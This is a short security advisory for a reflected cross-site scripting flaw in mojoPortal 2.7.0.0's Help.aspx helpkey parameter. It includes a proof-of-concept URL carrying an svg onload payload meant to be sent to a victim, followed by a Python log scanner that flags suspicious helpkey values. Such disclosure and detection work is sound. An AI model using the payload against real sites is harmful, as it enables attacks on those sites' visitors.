- Date: 29/09/2023
- Affected Version: mojoPortal 2.7.0.0
- Vendor Homepage: https://www.mojoportal.com/
- Exploit Author: Trungvm of VietSunshine Cyber Security Services

A cross-site scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component. This vulnerability is a bypass of CVE-2017-1000457.

Send the URL `http://[site]/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x='` to the victim. When the victim opens the URL, the XSS is executed.
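
To check whether requests of this shape have reached a site, the following added example (not part of the original advisory or of mojoPortal) decodes the `helpkey` value from access-log lines and flags anything outside an identifier allowlist. The log layout, the sample lines and the allowlist pattern are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate help keys are short identifiers (letters, digits, '.', '_', '-').
SAFE_HELPKEY = re.compile(r"[A-Za-z0-9._-]{1,128}")

# Constructed sample lines in a simplified W3C layout (assumed field order):
# date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2023-09-29 10:01:12 GET /Help.aspx helpkey=pagesettings-help 200
2023-09-29 10:02:40 GET /Help.aspx helpkey=xxxxxxx'%3E%3Csvg/onload=alert()+x=' 200
2023-09-29 10:03:05 GET /Default.aspx - 200
2023-09-29 10:04:18 GET /help.aspx HELPKEY=abc%27%3e%3csvg%2fonload%3dalert()%2bx%3d%27 200
"""

def helpkey_values(query):
    """Return every decoded helpkey value in a raw query string (name matched case-insensitively)."""
    if query == "-":  # W3C logs write '-' for an empty query
        return []
    params = parse_qs(query, keep_blank_values=True)
    return [v for name, vals in params.items() if name.lower() == "helpkey" for v in vals]

def flag_suspicious(log_text):
    """Return (line_number, decoded_value) for Help.aspx requests whose helpkey fails the allowlist."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = line.split(" ")
        if line.startswith("#") or len(fields) < 6:
            continue  # skip W3C directive lines and malformed rows
        stem, query = fields[3], fields[4]
        if not stem.lower().endswith("/help.aspx"):
            continue
        for value in helpkey_values(query):
            # Match on the decoded value so percent-encoded quotes and brackets are seen
            if not SAFE_HELPKEY.fullmatch(value):
                hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in flag_suspicious(SAMPLE_LOG):
        print(f"line {n}: suspicious helpkey {value!r}")
```

The same allowlist can be applied server-side to reject the request before the value is written into the page, alongside HTML attribute encoding of the output.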
